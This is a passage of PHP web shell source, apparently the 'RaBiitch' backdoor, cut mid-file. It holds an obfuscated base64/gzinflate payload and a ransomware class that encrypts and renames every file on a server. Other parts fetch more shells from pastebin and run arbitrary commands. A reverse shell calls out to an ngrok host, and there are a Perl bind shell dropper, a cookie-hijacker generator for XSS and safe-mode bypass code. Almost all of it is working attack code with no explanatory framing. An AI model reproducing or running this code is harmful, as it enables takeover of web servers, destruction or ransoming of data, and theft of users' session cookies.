  834. gzinflate(base64_decode("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"))))
  835. {
  836.                     echo '<i class="fa fa-thumbs-o-up"
  837. aria-hidden="true"></i>  index.php (Default
  838. Page)<br>';
  839.                 }
  840.             }
  841.         }
  842.         public function shcpackUnstall() {
  843.             if(file_exists(".htabak")) {
  844.                 if(unlink(".htaccess") &&
  845. unlink("index.php")) {
  846.                     echo '<i class="fa fa-thumbs-o-down"
  847. aria-hidden="true"></i> .htaccess (Default
  848. Page)<br>';
  849.                     echo '<i class="fa fa-thumbs-o-down"
  850. aria-hidden="true"></i> index.php (Default
  851. Page)<br>';
  852.                 }
  853.                 rename(".htabak", ".htaccess");
  854.             }
  855.         }
  856.         public function plus() {
  857.             flush();
  858.             ob_flush();
  859.         }
  860.         public function locate() {
  861.             return getcwd();
  862.         }
  863.         public function shcdirs($dir, $method, $key) {
  864.             switch($method) {
  865.                 case '1':
  866.                     deRanSomeware::shcpackInstall();
  867.                     break;
  868.                 case '2':
  869.                     deRanSomeware::shcpackUnstall();
  870.                     break;
  871.             }
  872.             foreach(scandir($dir) as $d) {
  873.                 if($d != '.' && $d != '..') {
  874.                     $locate = $dir . DIRECTORY_SEPARATOR . $d;
  875.                     if(!is_dir($locate)) {
  876.                         if(deRanSomeware::kecuali($locate,
  877. "ini.php") && deRanSomeware::kecuali($locate,
  878. ".png") && deRanSomeware::kecuali($locate,
  879. ".htaccess") && deRanSomeware::kecuali($locate,
  880. "ini.php") && deRanSomeware::kecuali($locate,
  881. "index.php") && deRanSomeware::kecuali($locate,
  882. ".htabak")) {
  883.                             switch($method) {
  884.                                 case '1':
  885.                                     deRanSomeware::shcEnCry($key,
  886. $locate);
  887.                                     deRanSomeware::shcEnDesDirS($locate,
  888. "1");
  889.                                     break;
  890.                                 case '2':
  891.                                     deRanSomeware::shcDeCry($key,
  892. $locate);
  893.                                     deRanSomeware::shcEnDesDirS($locate,
  894. "2");
  895.                                     break;
  896.                             }
  897.                         }
  898.                     } else {
  899.                         deRanSomeware::shcdirs($locate, $method, $key);
  900.                     }
  901.                 }
  902.                 deRanSomeware::plus();
  903.             }
  904.         }
  905.         public function shcEnDesDirS($locate, $method) {
  906.             switch($method) {
  907.                 case '1':
  908.                     rename($locate, $locate . ".bak");
  909.                     break;
  910.                 case '2':
  911.                     $locates = str_replace(".bak", "",
  912. $locate);
  913.                     rename($locate, $locates);
  914.                     break;
  915.             }
  916.         }
  917.         public function shcEnCry($key, $locate) {
  918.             $data      = file_get_contents($locate);
  919.             $iv        =
  920. mcrypt_create_iv(mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC),
  921. MCRYPT_DEV_URANDOM);
  922.             $encrypted = base64_encode($iv .
  923. mcrypt_encrypt(MCRYPT_RIJNDAEL_128, hash('sha256', $key, true), $data,
  924. MCRYPT_MODE_CBC, $iv));
  925.             if(file_put_contents($locate, $encrypted)) {
  926.                 echo '<i class="fa fa-lock"
  927. aria-hidden="true"></i> <font
  928. color="#00BCD4">Locked</font> (<font
  929. color="#40CE08">Success</font>) <font
  930. color="#FF9800">|</font> <font
  931. color="#2196F3">' . $locate . '</font> <br>';
  932.             } else {
  933.                 echo '<i class="fa fa-lock"
  934. aria-hidden="true"></i> <font
  935. color="#00BCD4">Locked</font> (<font
  936. color="red">Failed</font>) <font
  937. color="#FF9800">|</font> ' . $locate . ' <br>';
  938.             }
  939.         }
  940.         public function shcDeCry($key, $locate) {
  941.             $data      = base64_decode(file_get_contents($locate));
  942.             $iv        = substr($data, 0,
  943. mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));
  944.             $decrypted = rtrim(mcrypt_decrypt(MCRYPT_RIJNDAEL_128,
  945. hash('sha256', $key, true), substr($data,
  946. mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)),
  947. MCRYPT_MODE_CBC,
  948. $iv), "\0");
  949.             if(file_put_contents($locate, $decrypted)) {
  950.                 echo '<i class="fa fa-unlock"
  951. aria-hidden="true"></i> <font
  952. color="#FFEB3B">Unlock</font> (<font
  953. color="#40CE08">Success</font>) <font
  954. color="#FF9800">|</font> <font
  955. color="#2196F3">' . $locate . '</font> <br>';
  956.             } else {
  957.                 echo '<i class="fa fa-unlock"
  958. aria-hidden="true"></i> <font
  959. color="#FFEB3B">Unlock</font> (<font
  960. color="red">Failed</font>) <font
  961. color="#FF9800">|</font> <font
  962. color="#2196F3">' . $locate . '</font> <br>';
  963.             }
  964.         }
  965.         public function kecuali($ext, $name) {
  966.             $re = "/({$name})/";
  967.             preg_match($re, $ext, $matches);
  968.             if($matches[1]) {
  969.                 return false;
  970.             }
  971.             return true;
  972.         }
  973.     }
  974.     if($_POST['submit']) {
  975.         switch($_POST['method']) {
  976.             case '1':
  977.                 deRanSomeware::shcdirs(deRanSomeware::locate(),
  978. "1", $_POST['key']);
  979.                 break;
  980.             case '2':
  981.                 deRanSomeware::shcdirs(deRanSomeware::locate(),
  982. "2", $_POST['key']);
  983.                 break;
  984.         }
  985.     } else {
  986.         echo "
  987. <form action='' method='post' style='text-align: center;'>
  988. <label>Key : </label>
  989. <input type='text' name='key' class='inpute' placeholder='KEY
  990. ENC/DEC'>
  991. <select name='method' class='selecte'>
  992.         <option value='1'>Jangan sok tau deh, klo ga mau
  993. error</option>
  994.         <option value='2'>Ini juga</option>
  995.      </select>
  996.      <input type='submit' name='submit' class='udah aku peringatin :)'
  997. value='Submit'/>
  998. </form>";
  999.     }
  1000.     echo "
  1001. </div>
  1002. </body>";
  1003. }
  1004. function idxshell() {
  1005.     if(!file_exists('.config')) {
  1006.         mkdir('.config', 0755);
  1007.     }
  1008.     $nama = fopen(".config/idx.php", "w");
  1009.     $file = file_get_contents('https://pastebin.com/raw/5UQAgFsp');
  1010.     fwrite($nama, $file);
  1011.     chmod($nama, 0444);
  1012.     fclose($nama);
  1013. }
  1014. function adminer() {
  1015.     if(!file_exists('.config')) {
  1016.         mkdir('.config', 0755);
  1017.     }
  1018.     $nama = fopen(".config/adminer.php", "w+");
  1019.     $file =
  1020. file_get_contents('https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php');
  1021.     fwrite($nama, $file);
  1022.     fclose($nama);
  1023. }
  1024. function jembud2() {
  1025.     if(!file_exists('.config')) {
  1026.         mkdir('.config', 0755);
  1027.     }
  1028.     $nama = fopen(".config/jembud2.php", "w+");
  1029.     $file = file_get_contents('https://pastebin.com/raw/nCqVmtBu');
  1030.     fwrite($nama, $file);
  1031.     chmod($nama, 0444);
  1032.     fclose($nama);
  1033. }
  1034. function ngindex() {
  1035.     $nama = fopen("RaBiitch.php", "w+");
  1036.     $file = file_get_contents('https://pastebin.com/raw/zsyEUczS');
  1037.     fwrite($nama, $file);
  1038.     chmod($nama, 0444);
  1039.     fclose($nama);
  1040. }
  1041. function filemanager_bg() {
  1042.     global $sep, $self;
  1043.     $path = !empty($_GET['path']) ? $_GET['path'] : getcwd();
  1044.     $dirs = array();
  1045.     $fils = array();
  1046.     if(is_dir($path)) {
  1047.         chdir($path);
  1048.         if($handle = opendir($path)) {
  1049.             while(($item = readdir($handle)) !== FALSE) {
  1050.                 if($item == ".") {
  1051.                     continue;
  1052.                 }
  1053.                 if($item == "..") {
  1054.                     continue;
  1055.                 }
  1056.                 if(is_dir($item)) {
  1057.                     array_push($dirs, $path . $sep . $item);
  1058.                 } else {
  1059.                     array_push($fils, $path . $sep . $item);
  1060.                 }
  1061.             }
  1062.         } else {
  1063.             alert("Access Denied for this operation");
  1064.         }
  1065.     } else {
  1066.         alert("Directory Not Found!!!");
  1067.     }
  1068.     echo "
  1069. <div id=result>
  1070. <table class=table>
  1071.    <tr>
  1072.    <th width='500px'>Name</th>
  1073.    <th width='100px'>Size</th>
  1074.    <th width='100px'>Permissions</th>
  1075.    <th width='500px'>Actions</th>
  1076.    </tr>";
  1077.     foreach($dirs as $dir) {
  1078.         echo "<tr><td><a
  1079. href='{$self}?path={$dir}'>" . basename($dir) .
  1080. "</a></td>
  1081. <td>" . filesize_x($dir) . "</td>
  1082. <td><a href='{$self}?path={$path}&amp;perm={$dir}'>"
  1083. .
  1084. file_perm($dir) . "</a></td>
  1085. <td><a
  1086. href='{$self}?path={$path}&amp;del_dir={$dir}'>Delete</a> |
  1087. <a
  1088. href='{$self}?path={$path}&amp;rename={$dir}'>Rename</a>
  1089. | <a href='{$self}?zip={$dir}'> Download
  1090. </a></td></tr>";
  1091.     }
  1092.     foreach($fils as $fil) {
  1093.         echo "<tr><td><a
  1094. href='{$self}?path={$path}&amp;read={$fil}'>" . basename($fil)
  1095. . "</a></td>
  1096.              <td>" . filesize_x($fil) . "</td>
  1097.              <td><a
  1098. href='{$self}?path={$path}&amp;perm={$fil}'>" .
  1099. file_perm($fil)
  1100. . "</a></td>
  1101.              <td><a
  1102. href='{$self}?path={$path}&amp;del_fil={$fil}'>Delete</a> |
  1103. <a
  1104. href='{$self}?path={$path}&amp;rename={$fil}'>Rename</a>
  1105. | <a href='{$self}?path={$path}&amp;edit={$fil}'>Edit</a>
  1106. |
  1107. <a href='{$self}?path={$path}&amp;copy={$fil}'>Copy</a> |
  1108. <a href='{$self}?zip={$fil}'> Download </a>
  1109. </td>";
  1110.     }
  1111.     echo "</tr></table></div>";
  1112. }
  1113. function rename_bg() {
  1114.     if(isset($_GET['old_name']) && isset($_GET['new_name'])) {
  1115.         $o_r_path   = basename($_GET['old_name']);
  1116.         $r_path     = str_replace($o_r_path, "",
  1117. $_GET['old_name']);
  1118.         $r_new_name = $r_path . $_GET['new_name'];
  1119.         echo $r_new_name;
  1120.         if(rename($_GET['old_name'], $r_new_name) == FALSE) {
  1121.             alert("Access Denied for this action!!!");
  1122.         } else {
  1123.             alert("Renamed File Succeessfully");
  1124.         }
  1125.     }
  1126. }
  1127. function edit_file() {
  1128.     $path = $_GET['path'];
  1129.     chdir($path);
  1130.     $edt_file  = $_GET['edit'];
  1131.     $e_content = wordwrap(htmlspecialchars(file_get_contents($edt_file)));
  1132.     if($e_content) {
  1133.         $o_content = $e_content;
  1134.     } else if(function_exists('fgets') && function_exists('fopen')
  1135. && function_exists('feof')) {
  1136.         $fd = fopen($edt_file, "rb");
  1137.         if(!$fd) {
  1138.             alert("Permission Denied");
  1139.         } else {
  1140.             while(!feof($fd)) {
  1141.                 $o_content = wordwrap(htmlspecialchars(fgets($fd)));
  1142.             }
  1143.         }
  1144.         fclose($fd);
  1145.     }
  1146.     echo "<div id='result'>
  1147.    <center><h2>Edit
  1148. File</h2><hr></center><br>
  1149.     <font color=red>View File</font> : <font
  1150. color=yellow><a style='text-decoration:none; color:yellow;'
  1151. href='?read=" . $_GET['edit'] . "'>" .
  1152. basename($_GET['edit']) . "</a><br /><br
  1153. /><hr><br></font>
  1154. <form method='POST'><input type='hidden' name='e_file'
  1155. value=" . $_GET['edit'] . ">
  1156.          <center><textarea spellcheck='false'
  1157. class='textarea_edit' name='e_content_n' cols='80' rows='25'>" .
  1158. $o_content . "</textarea></center>
  1159.           <hr>
  1160.          <input class='input_big' name='save' type='submit'
  1161. value='Submit'
  1162. ><br><br><hr><br><br></div>";
  1163. }
  1164. function edit_file_bg() {
  1165.     if(file_exists($_POST['e_file'])) {
  1166.         $handle = fopen($_POST['e_file'], "w+");
  1167.         if(!handle) {
  1168.             alert("Permission Denied");
  1169.         } else {
  1170.             fwrite($handle, $_POST['e_content_n']);
  1171.             alert("Your changes were Successfully Saved!");
  1172.         }
  1173.         fclose($handle);
  1174.     } else {
  1175.         alert("File Not Found!!!");
  1176.     }
  1177. }
  1178. function delete_file() {
  1179.     $del_file = $_GET['del_fil'];
  1180.     if(unlink($del_file) != FALSE) {
  1181.         alert("Deleted Successfully");
  1182.         exit;
  1183.     } else {
  1184.         alert("Access Denied for this Operation");
  1185.         exit;
  1186.     }
  1187. }
  1188. function deldirs($d_dir) {
  1189.     $d_files = glob($d_dir . '*', GLOB_MARK);
  1190.     foreach($d_files as $d_file) {
  1191.         if(is_dir($d_file)) {
  1192.             deldirs($d_file);
  1193.         } else {
  1194.             unlink($d_file);
  1195.         }
  1196.     }
  1197.     if(is_dir($d_dir)) {
  1198.         if(rmdir($d_dir)) {
  1199.             alert("Deleted Directory Successfully");
  1200.         } else {
  1201.             alert("Access Denied for this Operation");
  1202.         }
  1203.     }
  1204. }
  1205. function code_viewer() {
  1206.     $path      = $_GET['path'];
  1207.     $r_file    = $_GET['read'];
  1208.     $r_content = wordwrap(htmlspecialchars(file_get_contents($r_file)));
  1209.     if($r_content) {
  1210.         $rr_content = $r_content;
  1211.     } else if(function_exists('fgets') && function_exists('fopen')
  1212. && function_exists('feof')) {
  1213.         $fd = fopen($r_file, "rb");
  1214.         if(!$fd) {
  1215.             alert("Permission Denied");
  1216.         } else {
  1217.             while(!feof($fd)) {
  1218.                 $rr_content = wordwrap(htmlspecialchars(fgets($fd)));
  1219.             }
  1220.         }
  1221.         fclose($fd);
  1222.     }
  1223.     echo "<div id=result><center><h2>View
  1224. File</h2></center><hr><br>
  1225. <font color=red>Edit File</font><font color=yellow> :
  1226. </font>
  1227. <font color=#999><a style='text-decoration:none; color:yellow;'
  1228. href='?path={$path}&amp;edit=" . $_GET['read'] .
  1229. "'>"
  1230. . basename($_GET['read']) .
  1231. "</a></font><br><br><hr><pre><code>"
  1232. . $rr_content . "</code></pre>
  1233. <br><br><hr><br><br></div>";
  1234. }
  1235. function copy_file_ui() {
  1236.     echo "<div id=result><center><h2>Copy
  1237. File</h2><hr /><br /><br /><table
  1238. class=table><form method='GET'><tr><td
  1239. style='text-align:center;'>Copy : <input size=40 name='c_file'
  1240. value=" . $_GET['copy'] . " > To : <input size=40
  1241. name='c_target' value=" . $_GET['path'] . $sep . "> Name :
  1242. <input name='cn_name'><input type='submit' value='
  1243. O'></form></table><br><br><hr><br><br><br></center></div>";
  1244. }
  1245. function copy_file_bg() {
  1246.     global $sep;
  1247.     if(function_exists(copy)) {
  1248.         if(copy($_GET['c_file'], $_GET['c_target'] . $sep .
  1249. $_GET['cn_name'])) {
  1250.             alert("Succeded");
  1251.         } else {
  1252.             alert("Access Denied");
  1253.         }
  1254.     }
  1255. }
  1256. function ch_perm_bg() {
  1257.     if(isset($_GET['p_filex']) && isset($_GET['new_perm'])) {
  1258.         if(chmod($_GET['p_filex'], $_GET['new_perm']) != FALSE) {
  1259.             alert("Succeded. Permission Changed!!!");
  1260.         } else {
  1261.             alert("Access Denied for This Operation");
  1262.         }
  1263.     }
  1264. }
  1265. function ch_perm_ui() {
  1266.     $p_file = $_GET['perm'];
  1267.     echo "<div id =result>
  1268.    <center><h2>New Permission</h2><hr /><p>
  1269.    <form method
  1270.    '>
  1271.    <input type='hidden' name='path' value=" . getcwd() . "
  1272. ><input name='p_filex' type=hidden
  1273. value={$p_file} >New Permission : <input name='new_perm' isze='40'
  1274. value=0" . substr(sprintf('%o', fileperms($p_file)), -3) .
  1275. "><input type='submit' value=' O'
  1276. /></form></p><p>Full Access : <font
  1277. color=red>755</font><br />Notice : <font
  1278. color=red>Don't use Unix Access like 777, 666, etc. Use 755, 655,
  1279. etc</p><br /><br /><hr /><br /><br
  1280. /></center></div>";
  1281.     ch_perm_bg();
  1282. }
  1283. function mk_file_ui() {
  1284.     chdir($_GET['path']);
  1285.     echo "<div id=result><br><br><font
  1286. color=red><form method='GET'>
  1287.          <input type='hidden' name='path' value=" . getcwd() .
  1288. ">
  1289.          New File Name : <input size='40' name='new_f_name'
  1290. value=" . $_GET['new_file'] .
  1291. "></font><br><br><hr><br><center>
  1292.          <textarea spellcheck='false' cols='80' rows='25'
  1293. class=textarea_edit
  1294. name='n_file_content'></textarea></center><hr>
  1295.          <input class='input_big' type='submit'
  1296. value='Submit'></form></center></div>";
  1297. }
  1298. function mk_file_bg() {
  1299.     chdir($_GET['path']);
  1300.     $c_path          = $_GET['path'];
  1301.     $c_file          = $_GET['new_f_name'];
  1302.     $c_file_contents = $_GET['n_file_content'];
  1303.     $handle          = fopen($c_file, "w");
  1304.     if(!$handle) {
  1305.         alert("Permission Denied");
  1306.     } else {
  1307.         fwrite($handle, $c_file_contents);
  1308.         alert("Your changes were Successfully Saved!");
  1309.     }
  1310.     fclose($handle);
  1311. }
  1312. function create_dir() {
  1313.     chdir($_GET['path']);
  1314.     $new_dir = $_GET['new_dir'];
  1315.     if(is_writable($_GET['path'])) {
  1316.         mkdir($new_dir);
  1317.         alert("Direcory Created Successfully");
  1318.         exit;
  1319.     } else {
  1320.         alert("Access Denied for this Operation");
  1321.         exit;
  1322.     }
  1323. }
  1324. function cmd($cmd) {
  1325.     chdir($_GET['path']);
  1326.     $res = "";
  1327.     if($_GET['cmdexe']) {
  1328.         $cmd = $_GET['cmdexe'];
  1329.     }
  1330.     if(function_exists('shell_exec')) {
  1331.         $res = shell_exec($cmd);
  1332.     } else if(function_exists('exec')) {
  1333.         exec($cmd, $res);
  1334.         $res = join("\n", $res);
  1335.     } else if(function_exists('system')) {
  1336.         ob_start();
  1337.         system($cmd);
  1338.         $res = ob_get_contents();
  1339.         ob_end_clean();
  1340.     } elseif(function_exists('passthru')) {
  1341.         ob_start();
  1342.         passthru($cmd);
  1343.         $res = ob_get_contents();
  1344.         ob_end_clean();
  1345.     } else if(function_exists('proc_open')) {
  1346.         $descriptorspec = array(
  1347.             0 => array(
  1348.                 "pipe",
  1349.                 "r"
  1350.             ),
  1351.             1 => array(
  1352.                 "pipe",
  1353.                 "w"
  1354.             ),
  1355.             2 => array(
  1356.                 "pipe",
  1357.                 "w"
  1358.             )
  1359.         );
  1360.         $handle         = proc_open($cmd, $descriptorspec, $pipes);
  1361.         if(is_resource($handle)) {
  1362.             if(function_exists('fread') &&
  1363. function_exists('feof'))
  1364. {
  1365.                 while(!feof($pipes[1])) {
  1366.                     $res .= fread($pipes[1], 512);
  1367.                 }
  1368.             } else if(function_exists('fgets') &&
  1369. function_exists('feof')) {
  1370.                 while(!feof($pipes[1])) {
  1371.                     $res .= fgets($pipes[1], 512);
  1372.                 }
  1373.             }
  1374.         }
  1375.         pclose($handle);
  1376.     } else if(function_exists('popen')) {
  1377.         $handle = popen($cmd, "r");
  1378.         if(is_resource($handle)) {
  1379.             if(function_exists('fread') &&
  1380. function_exists('feof'))
  1381. {
  1382.                 while(!feof($handle)) {
  1383.                     $res .= fread($handle, 512);
  1384.                 }
  1385.             } else if(function_exists('fgets') &&
  1386. function_exists('feof')) {
  1387.                 while(!feof($handle)) {
  1388.                     $res .= fgets($handle, 512);
  1389.                 }
  1390.             }
  1391.         }
  1392.         pclose($handle);
  1393.     }
  1394.     $res = wordwrap(htmlspecialchars($res));
  1395.     if($_GET['cmdexe']) {
  1396.         echo "<div id=result><center><font
  1397. color=yellow><h2>root@RaBiitch:~#</h2></center><hr><pre>"
  1398. . $res . "</font></pre></div>";
  1399.     }
  1400.     return $res;
  1401. }
  1402. function upload_file() {
  1403.     chdir($_POST['path']);
  1404.     if(move_uploaded_file($_FILES['upload_f']['tmp_name'],
  1405. $_FILES['upload_f']['name'])) {
  1406.         alert("Uploaded File Successfully");
  1407.     } else {
  1408.         alert("Access Denied!!!");
  1409.     }
  1410. }
  1411. function reverse_conn_ui() {
  1412.     global $your_ip;
  1413.     echo "<div id='result'>
  1414.          <center><h2>Reverse Shell</h2><hr>
  1415.          <br><br><form method='GET'>
  1416.           <table class=tbl>
  1417.          <tr>
  1418.          <td>Your IP : <input name='my_ip'
  1419. value='0.tcp.ngrok.io'>
  1420.   <br>
  1421.          PORT : <input name='my_port' value='40141'>
  1422.          <input type='submit' value='Submit'></td></tr>
  1423.           <select name='rev_option'
  1424. style='color:yellow;background-color:black;border:1px solid #666;'>
  1425. <option>PHP Reverse Shell</option>
  1426. <option>PERL Bind Shell</option>
  1427. </select></form>
  1428.          <tr><td>
  1429.           <font color=red>PHP Reverse Shell</font> : <font
  1430. color=yellow> nc -lvp
  1431. <i>port</i></font></td></tr><tr><td><font
  1432. color=red>PERL Bind Shell</font> : <font color=yellow> nc
  1433. <i>server_ip
  1434. port</i></font></td></tr></table></div>";
  1435. }
  1436. function reverse_conn_bg() {
  1437.     global $os;
  1438.     $option = $_REQUEST['rev_option'];
  1439.     $ip     = $_GET['my_ip'];
  1440.     $port   = $_GET['my_port'];
  1441.     if($option == "PHP Reverse Shell") {
  1442.         echo "<div
  1443. id=result><h2>RESULT<h2><hr><br>";
  1444.         function printit($string) {
  1445.             if(!$daemon) {
  1446.                 print "$string\n";
  1447.             }
  1448.         }
  1449.         $chunk_size = 1400;
  1450.         $write_a    = null;
  1451.         $error_a    = null;
  1452.         $shell      = 'uname -a; w; id; /bin/sh -i';
  1453.         $daemon     = 0;
  1454.         $debug      = 0;
  1455.         if(function_exists('pcntl_fork')) {
  1456.             $pid = pcntl_fork();
  1457.             if($pid == -1) {
  1458.                 printit("ERROR: Can't fork");
  1459.                 exit(1);
  1460.             }
  1461.             if($pid) {
  1462.                 exit(0);
  1463.             }
  1464.             if(posix_setsid() == -1) {
  1465.                 printit("Error: Can't setsid()");
  1466.                 exit(1);
  1467.             }
  1468.             $daemon = 1;
  1469.         } else {
  1470.             printit("WARNING: Failed to daemonise.  This is quite
  1471. common and not fatal.");
  1472.         }
  1473.         chdir("/");
  1474.         umask(0);
  1475.         $sock = fsockopen($ip, $port, $errno, $errstr, 30);
  1476.         if(!$sock) {
  1477.             printit("$errstr ($errno)");
  1478.             exit(1);
  1479.         }
  1480.         $descriptorspec = array(
  1481.             0 => array(
  1482.                 "pipe",
  1483.                 "r"
  1484.             ),
  1485.             1 => array(
  1486.                 "pipe",
  1487.                 "w"
  1488.             ),
  1489.             2 => array(
  1490.                 "pipe",
  1491.                 "w"
  1492.             )
  1493.         );
  1494.         $process        = proc_open($shell, $descriptorspec, $pipes);
  1495.         if(!is_resource($process)) {
  1496.             printit("ERROR: Can't spawn shell");
  1497.             exit(1);
  1498.         }
  1499.         stream_set_blocking($pipes[0], 0);
  1500.         stream_set_blocking($pipes[1], 0);
  1501.         stream_set_blocking($pipes[2], 0);
  1502.         stream_set_blocking($sock, 0);
  1503.         printit("<font color=yellow>Successfully opened reverse
  1504. shell to $ip:$port </font>");
  1505.         while(1) {
  1506.             if(feof($sock)) {
  1507.                 printit("ERROR: Shell connection terminated");
  1508.                 break;
  1509.             }
  1510.             if(feof($pipes[1])) {
  1511.                 printit("ERROR: Shell process terminated");
  1512.                 break;
  1513.             }
  1514.             $read_a              = array(
  1515.                 $sock,
  1516.                 $pipes[1],
  1517.                 $pipes[2]
  1518.             );
  1519.             $num_changed_sockets = stream_select($read_a, $write_a,
  1520. $error_a, null);
  1521.             if(in_array($sock, $read_a)) {
  1522.                 if($debug)
  1523.                     printit("SOCK READ");
  1524.                 $input = fread($sock, $chunk_size);
  1525.                 if($debug)
  1526.                     printit("SOCK: $input");
  1527.                 fwrite($pipes[0], $input);
  1528.             }
  1529.             if(in_array($pipes[1], $read_a)) {
  1530.                 if($debug)
  1531.                     printit("STDOUT READ");
  1532.                 $input = fread($pipes[1], $chunk_size);
  1533.                 if($debug)
  1534.                     printit("STDOUT: $input");
  1535.                 fwrite($sock, $input);
  1536.             }
  1537.             if(in_array($pipes[2], $read_a)) {
  1538.                 if($debug)
  1539.                     printit("STDERR READ");
  1540.                 $input = fread($pipes[2], $chunk_size);
  1541.                 if($debug)
  1542.                     printit("STDERR: $input");
  1543.                 fwrite($sock, $input);
  1544.             }
  1545.         }
  1546.         fclose($sock);
  1547.         fclose($pipes[0]);
  1548.         fclose($pipes[1]);
  1549.         fclose($pipes[2]);
  1550.         proc_close($process);
  1551.         echo
  1552. "<br><br><hr><br><br></div>";
  1553.     } else if($option == "PERL Bind Shell") {
  1554.         global $bind_perl, $os;
  1555.         $pbfl   = $bind_perl;
  1556.         $handlr = fopen("back.pl", "wb");
  1557.         if($handlr) {
  1558.             fwrite($handlr, gzinflate(base64_decode($bind_perl)));
  1559.         } else {
  1560.             alert("Access Denied for create new file");
  1561.         }
  1562.         fclose($handlr);
  1563.         if(file_exists("back.pl")) {
  1564.             if($os == "nix") {
  1565.                 cmd("chmod +x back.pl;perl back.pl $port");
  1566.             } else {
  1567.                 cmd("perl back.pl $port");
  1568.             }
  1569.         }
  1570.     }
  1571. }
  1572. function cookie_jack() {
  1573.     global $cookie_highjacker;
  1574.     echo "<div
  1575. id=result><center><h2>NOTICE</h2><hr/>";
  1576.     if(function_exists('fopen') && function_exists('fwrite')) {
  1577.         $cook   = gzinflate(base64_decode($cookie_highjacker));
  1578.         $han_le = fopen("404.php", "w+");
  1579.         if($han_le) {
  1580.             fwrite($han_le, $cook);
  1581.             echo "Yes... Cookie highjacker is generated<br>
  1582. Name
  1583. : <a style='color:yellow;' target=_blank
  1584. href=404.php>404.php</a></font>.<br
  1585. />It is usefull in XSS<br />It will make a file
  1586. <font color=red>configuration.txt</font> in this direcory and
  1587. save the cookie value in it. :p cheers...<br /><br /><hr
  1588. /><br /><br /></center></div>";
  1589.         } else {
  1590.             echo "<font color=red>Sorry... Generate COOKIE
  1591. HIGHJACKER failed<br /><br /><hr /><br /><br
  1592. /></center></div>";
  1593.         }
  1594.     }
  1595. }
  1596. function safe_mode_fuck() {
  1597.     global $s_php_ini, $s_htaccess, $s_htaccess_pl, $ini_php;
  1598.     $path = chdir($_GET['path']);
  1599.     chdir($_GET['path']);
  1600.     switch($_GET['safe_mode']) {
  1601.         case "s_php_ini":
  1602.             $s_file = $s_php_ini;
  1603.             $s_name = "php.ini";
  1604.             break;
  1605.         case "s_htaccess":
  1606.             $s_name = ".htaccess";
